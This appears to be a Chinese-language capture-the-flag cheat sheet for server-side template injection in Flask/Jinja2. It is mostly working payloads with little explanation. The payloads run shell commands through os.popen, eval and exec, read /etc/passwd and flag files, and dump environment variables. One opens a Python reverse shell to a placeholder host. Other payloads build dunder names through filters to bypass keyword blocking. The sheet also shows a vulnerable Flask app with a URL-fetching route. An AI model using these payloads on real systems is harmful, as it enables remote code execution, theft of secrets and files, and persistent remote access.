# 使用 python 脚本 用于寻找序号 url = "http://url/level/1" deffind_eval(url): for i inrange(500): data = { 'code': "{{().__class__.__bases__[0].__subclasses__()["+str(i)+"].__init__.__globals__['__builtins__']}}", } res = requests.post(url, data=data, headers=headers) if'eval'in res.text: print(data) find_eval(url)
这个code是我们测试出来的注入点,也可以用模板语言直接找到之后发送payload
1 2 3 4 5 6
# 模板语法 _ 命令执行_eval {%for x in [].__class__.__base__.__subclasses__() %} {%if x.__init__ is defined and x.__init__.__globals__ is defined and 'eval'in x.__init__.__globals__['__builtins__']['eval'].__name__ %} {{ x.__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls /").read()') }} {%endif%} {%endfor%}
# 命令执行_eval {% for x in [].__class__.__base__.__subclasses__() %} {% if x.__init__ is defined and x.__init__.__globals__ is defined and'eval'in x.__init__.__globals__['__builtins__']['eval'].__name__ %} {{ x.__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls /").read()') }} {% endif %} {% endfor %}
# 命令执行_os.py {% for x in [].__class__.__base__.__subclasses__() %} {% if x.__init__ is defined and x.__init__.__globals__ is defined and'os'in x.__init__.__globals__ %} {{ x.__init__.__globals__['os'].popen('ls /').read() }} {% endif %} {% endfor %}
# 命令执行_popen {% for x in [].__class__.__base__.__subclasses__() %} {% if x.__init__ is defined and x.__init__.__globals__ is defined and'popen'in x.__init__.__globals__ %} {{ x.__init__.__globals__['popen']('ls /').read() }} {% endif %} {% endfor %}
# 命令执行__frozen_importlib.BuiltinImporter {% for x in [].__class__.__base__.__subclasses__() %} {% if'BuiltinImporter'in x.__name__ %} {{ x["load_module"]("os")["popen"]("ls /").read() }} {% endif %} {% endfor %}
# 命令执行_linecache {% for x in [].__class__.__base__.__subclasses__() %} {% if x.__init__ is defined and x.__init__.__globals__ is defined and'linecache'in x.__init__.__globals__ %} {{ x.__init__.__globals__['linecache']['os'].popen('ls /').read() }} {% endif %} {% endfor %}
# 命令执行_exec(无回显故反弹shell) {% for x in [].__class__.__base__.__subclasses__() %} {% if x.__init__ is defined and x.__init__.__globals__ is defined and'exec'in x.__init__.__globals__['__builtins__']['exec'].__name__ %} {{ x.__init__.__globals__['__builtins__']['exec']('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("HOST_IP",Port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")')}} {% endif %} {% endfor %}
# 命令执行_catch_warnings {% for x in [].__class__.__base__.__subclasses__() %}{% if'war'in x.__name__ %}{{ x.__init__.__globals__['__builtins__'].eval("__import__('os').popen('whoami').read()") }}{% endif %}{% endfor %}
# catch_warnings 读取文件 {% for x in [].__class__.__base__.__subclasses__() %}{% if x.__name__=='catch_warnings' %}{{ x.__init__.__globals__['__builtins__'].open('/app/flag', 'r').read() }}{% endif %}{% endfor %}
# _frozen_importlib_external.FileLoader 读取文件 {% for x in [].__class__.__base__.__subclasses__() %} # {% for x in [].__class__.__bases__[0].__subclasses__() %} {% if'FileLoader'in x.__name__ %} {{ x["get_data"](0,"/etc/passwd")}} {% endif %} {% endfor %}
@app.route('/read') defread(): try: url = request.args.get('url') m = re.findall(r'^file.*', url, re.IGNORECASE) n = re.findall(r'flag', url, re.IGNORECASE) if m or n: return'No Hack'
res = urllib.urlopen(url) return res.read() except Exception as ex: print(str(ex)) return'no response'
@app.route('/flag') defflag(): if session and session.get('username') == 'fuck': returnopen('/flag.txt').read() else: return'Access denied'
if __name__ == '__main__': app.run(debug=True, host="0.0.0.0")
{% for x in [].__class__.__base__.__subclasses__() %} {% if x.__init__ is defined and x.__init__.__globals__ is defined and'eval'in x.__init__.__globals__['__builtins__']['eval'].__name__ %} {{ x.__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls /").read()') }} {% endif %} {% endfor %}
{% for x in [].__class__.__base__.__subclasses__() %} {% if x.__init__ is defined and x.__init__.__globals__ is defined and'eval'in x.__init__.__globals__['__builtins__']['eval'].__name__ %} {{ x.__init__.__globals__['__builtins__']['eval']('__import__("os").popen("env").read()') }} {% endif %} {% endfor %}
{% set c=dict(__class__=wtf)|join %} {% set b=dict(__base__=wtf)|join %} {% set s=dict(__subclasses__=wtf)|join %} {% set gi=dict(__getitem__=wtf)|join %} {% set init=dict(__init__=wtf)|join %} {% set gl=dict(__globals__=wtf)|join %} {% set im=dict(__import__=wtf)|join %} {% set o=dict(os=wtf)|join %} {% set p=dict(popen=wtf)|join %} {% set e=dict(env=wtf)|join %} {% set r=dict(read=wtf)|join %}
{% set eighty=dict(aaaaabbbbbcccccdddddaaaaabbbbbcccccdddddaaaaabbbbbcccccdddddaaaaabbbbbcccccddddd=wtf)|join|count %} {% set six=dict(aaaaaa=wtf)|join|count %} {% set sf=eighty-six %}
{% set p = dict(pop=wtf)|join %} {% set underline=config|string|list|attr(p)(sf) %}
{% set c=(underline,underline,dict(class=wtf)|join,underline,underline)|join%} {% set b=(underline,underline,dict(base=wtf)|join,underline,underline)|join%} {% set s=(underline,underline,dict(subclasses=wtf)|join,underline,underline)|join%} {% set gi=(underline,underline,dict(getitem=wtf)|join,underline,underline)|join%} {% set init=(underline,underline,dict(init=wtf)|join,underline,underline)|join%} {% set gl=(underline,underline,dict(globals=wtf)|join,underline,underline)|join%} {% set im=(underline,underline,dict(import=wtf)|join,underline,underline)|join%}
{% set o=dict(os=wtf)|join %} {% set p=dict(popen=wtf)|join %} {% set e=dict(env=wtf)|join %} {% set r=dict(read=wtf)|join %}
{% set p = dict(pop=wtf)|join %} {% set underline=lipsum|string|list|attr(p)(18) %}
{% set c=(underline,underline,dict(cl=wtf)|join,dict(ass=wtf)|join,underline,underline)|join%} {% set b=(underline,underline,dict(base=wtf)|join,underline,underline)|join%} {% set s=(underline,underline,dict(subcl=wtf)|join,dict(asses=wtf)|join,underline,underline)|join%} {% set gi=(underline,underline,dict(getitem=wtf)|join,underline,underline)|join%} {% setin=(underline,underline,dict(in=wtf)|join,dict(it=wtf)|join,underline,underline)|join%} {% set gl=(underline,underline,dict(globals=wtf)|join,underline,underline)|join%} {% set im=(underline,underline,dict(import=wtf)|join,underline,underline)|join%}
{% set o=dict(os=wtf)|join %} {% set p=dict(popen=wtf)|join %} {% set e=dict(env=wtf)|join %} {% set r=dict(read=wtf)|join %}